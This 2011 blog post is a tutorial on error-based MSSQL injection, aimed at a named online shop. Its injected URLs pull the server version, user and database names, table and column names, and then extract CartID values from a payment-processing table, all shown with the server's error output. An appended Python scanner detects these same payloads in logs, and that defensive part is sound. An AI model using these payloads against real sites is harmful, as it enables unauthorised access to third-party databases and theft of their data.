Monday, January 10, 2011

Hacking Tutorial Using SQLi/MSSQL




First of all, my apologies to the masters reading this; I just want to share with those who do not yet know how hacking with SQLi/MSSQL works.
OK, let's start.
As an example I have a target website:

http://www.bluraydvdonly.com


OK, let's test for SQL injection.

http://www.bluraydvdonly.com/category.asp?catID=20'

Microsoft OLE DB Provider for SQL Server  error '80040e14'

Unclosed quotation mark before the character string '20';'.

/PageData/page.platform.access.asp, line 11

So it turns out to be MSSQL. OK, let's investigate further.

We trigger an error message with convert() to get the version (@@version):

http://www.bluraydvdonly.com/category.asp?catID=20' and 1=convert(int,@@version)--

Microsoft OLE DB Provider for SQL Server  error '80040e07'

Syntax error converting the nvarchar value 'Microsoft SQL Server 2000 - 8.00.2055 (Intel X86) Dec 16 2008 19:46:53 Copyright (c) 1988-2003 Microsoft Corporation Developer Edition on Windows NT 5.2 (Build 3790: Service Pack 2) ' to a column of data type int.

/PageData/page.platform.access.asp, line 11

There's the version.
So we are exploiting the error message from SQL Server:
because we try to convert a string into an integer --> convert(int, inject_here), it throws an error message like the one above.
Let's look at some other things.

Check the user with the user_name() function:

http://www.bluraydvdonly.com/category.asp?catID=20' and 1=convert(int,user_name())--
OR
http://www.bluraydvdonly.com/category.asp?catID=20' and 1=convert(int,user)--


Microsoft OLE DB Provider for SQL Server  error '80040e07'

Syntax error converting the nvarchar value 'dbo' to a column of data type int.

/PageData/page.platform.access.asp, line 11

Check the database name:

http://www.bluraydvdonly.com/category.asp?catID=20' and 1=convert(int,db_name())--

Microsoft OLE DB Provider for SQL Server error '80040e07'

Syntax error converting the nvarchar value 'BluerayDVD' to a column of data type int.

/PageData/page.platform.access.asp, line 11

There we can see the database name: "BluerayDVD".

Want to see the other databases? Just pass an index to the function: db_name(index)

http://www.bluraydvdonly.com/category.asp?catID=20' and 1=convert(int,db_name(1))--

http://www.bluraydvdonly.com/category.asp?catID=20' and 1=convert(int,db_name(2))--

and so on.

Now let's look at the contents of the BluerayDVD database.

http://www.bluraydvdonly.com/category.asp?catID=20' and 1=convert(int,(select top 1 table_name from information_schema.tables))--

Microsoft OLE DB Provider for SQL Server  error '80040e07'

Syntax error converting the nvarchar value 'CentinelProcessing' to a column of data type int.

/PageData/page.platform.access.asp, line 11

That's the first table we get: CentinelProcessing.
Oh, and since db_name() --> BluerayDVD, BluerayDVD is the database currently connected, so we don't need to add ...where table_catalog=db_name()...
The result is the same anyway:

http://www.bluraydvdonly.com/category.asp?catID=20' and 1=convert(int,(select top 1 table_name from information_schema.tables where table_catalog=db_name()))--

In MySQL we usually use LIMIT to pull the rows out one by one;
in MSSQL we use --> not in()
Look at this: the same query as before, just with not in() added:

http://www.bluraydvdonly.com/category.asp?catID=20' and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in('CentinelProcessing')))--

Microsoft OLE DB Provider for SQL Server  error '80040e07'

Syntax error converting the nvarchar value 'Cities' to a column of data type int.

/PageData/page.platform.access.asp, line 11

There we get the 2nd table.

select top 1 table_name from information_schema.tables where table_name not in('CentinelProcessing')

Translated, this means --> show me the table_name from the `information_schema.tables` table where table_name is not CentinelProcessing.

On to the next table; we already got the 2nd table, Cities:

http://www.bluraydvdonly.com/category.asp?catID=20' and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in('CentinelProcessing','Cities')))--

Microsoft OLE DB Provider for SQL Server  error '80040e07'

Syntax error converting the nvarchar value 'check_sysuser' to a column of data type int.

/PageData/page.platform.access.asp, line 11

Got the table check_sysuser. Keep going until you have all the table names, or the table you are after.
Once no more error messages appear, you have all the tables.

View the column names of a table, for example the CentinelProcessing table:

http://www.bluraydvdonly.com/category.asp?catID=20' and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='CentinelProcessing'))--

Microsoft OLE DB Provider for SQL Server  error '80040e07'

Syntax error converting the nvarchar value 'DataKey' to a column of data type int.

/PageData/page.platform.access.asp, line 11

If you notice, here we are using the tables in information_schema to get table and column names, similar to injection in MySQL version 5.

To get the next column name, do the same as for table names: use not in()

http://www.bluraydvdonly.com/category.asp?catID=20' and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='CentinelProcessing' and column_name not in('DataKey')))--

Microsoft OLE DB Provider for SQL Server  error '80040e07'

Syntax error converting the nvarchar value 'CartID' to a column of data type int.

/PageData/page.platform.access.asp, line 11

Got the second column of the CentinelProcessing table --> CartID

Next column...

http://www.bluraydvdonly.com/category.asp?catID=20' and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='CentinelProcessing' and column_name not in('DataKey','CartID')))--

Microsoft OLE DB Provider for SQL Server  error '80040e07'

Syntax error converting the nvarchar value 'CID' to a column of data type int.

/PageData/page.platform.access.asp, line 11

Keep going until no error appears, which means you have got them all.
Now that we have the table name and its columns, we can move on to viewing the contents.

Let's look at the contents of 'CartID' in the CentinelProcessing table:

http://www.bluraydvdonly.com/category.asp?catID=20' and 1=convert(int,(select top 1 CartID from CentinelProcessing))--
Syntax error converting the varchar value 'CSR@TQJWQKT1POG6P4ENBMDGXPNJVT9O697FIR67ELH2DP3HD5' to a column of data type int.

http://www.bluraydvdonly.com/category.asp?catID=20' and 1=convert(int,(select top 1 CartID from CentinelProcessing where CartID not in('CSR@TQJWQKT1POG6P4ENBMDGXPNJVT9O697FIR67ELH2DP3HD5')))--
Syntax error converting the varchar value 'CSR@C63CNXD3BQN78V9DJCW3426MQVHPPZ35YHRMBXZEX1B8W5' to a column of data type int.

http://www.bluraydvdonly.com/category.asp?catID=20' and 1=convert(int,(select top 1 CartID from CentinelProcessing where CartID not in('CSR@TQJWQKT1POG6P4ENBMDGXPNJVT9O697FIR67ELH2DP3HD5','CSR@C63CNXD3BQN78V9DJCW3426MQVHPPZ35YHRMBXZEX1B8W5')))--
Syntax error converting the varchar value 'CSR@64VB3W6E22SJ2IQZNZPSB2ZV87M2JNKSU4KKRXUFP2HTPJ' to a column of data type int.

and so on...

That's all from me for now; I hope it is useful for those who want to learn.
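From the defender's side, as an added example that is not part of the original post: a small Python scanner that flags, in web-server log lines, the request patterns this tutorial relies on (a stray quote on a numeric id, convert(int, ...), server built-ins, information_schema reads, NOT IN paging, the trailing "--"), and a check for whether a response body still echoes the raw OLE DB error text that makes the technique work. The log format and the sample lines are constructed assumptions, not real traffic.

```python
import re
from typing import List
from urllib.parse import unquote_plus

# Constructed IIS-style log lines (date time method path query status); not real traffic.
SAMPLE_LOG = """\
2011-01-10 10:00:01 GET /category.asp catID=20 200
2011-01-10 10:00:02 GET /category.asp catID=20' 500
2011-01-10 10:00:03 GET /category.asp catID=20'%20and%201=convert(int,@@version)-- 500
2011-01-10 10:00:04 GET /category.asp catID=20'%20and%201=convert(int,(select%20top%201%20table_name%20from%20information_schema.tables%20where%20table_name%20not%20in('CentinelProcessing')))-- 500
2011-01-10 10:00:05 GET /category.asp catID=21 200
"""

# Each signature corresponds to one step of the error-based technique in the post.
SIGNATURES = {
    "stray_quote": re.compile(r"=\d+'"),                       # quote appended to a numeric id
    "convert_error": re.compile(r"convert\s*\(\s*int\s*,", re.I),  # forced type-conversion error
    "mssql_builtin": re.compile(r"@@version|\buser_name\s*\(|\bdb_name\s*\(", re.I),
    "schema_probe": re.compile(r"information_schema\.(tables|columns)", re.I),
    "not_in_paging": re.compile(r"\bnot\s+in\s*\(", re.I),       # walking rows one at a time
    "comment_terminator": re.compile(r"--\s*$"),                # discards the rest of the query
}

def classify_query(raw_query: str) -> List[str]:
    """URL-decode a query string and return the names of the signatures it matches."""
    decoded = unquote_plus(raw_query)
    return [name for name, rx in SIGNATURES.items() if rx.search(decoded)]

def scan_log(text: str) -> List[dict]:
    """Flag every request whose query string matches at least one signature."""
    hits = []
    for line in text.splitlines():
        date, time, method, path, query, status = line.split(" ")
        tags = classify_query(query)
        if tags:
            hits.append({"time": f"{date} {time}", "path": path,
                         "status": int(status), "tags": tags})
    return hits

# The post only works because the server echoes the provider error text to the client.
# A match here means verbose database errors reach users and should be replaced by a
# generic error page (and the underlying query built with parameters, not string concat).
LEAK_RE = re.compile(r"Microsoft OLE DB Provider for SQL Server\s+error '8004[0-9a-f]{4}'", re.I)

def response_leaks_sql_error(body: str) -> bool:
    """True if a response body exposes a raw SQL Server provider error."""
    return LEAK_RE.search(body) is not None
```

A single flagged request with status 500 followed by more from the same client, each adding one value to a NOT IN list, is the row-by-row enumeration the post walks through and is worth alerting on as a sequence, not just per line.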
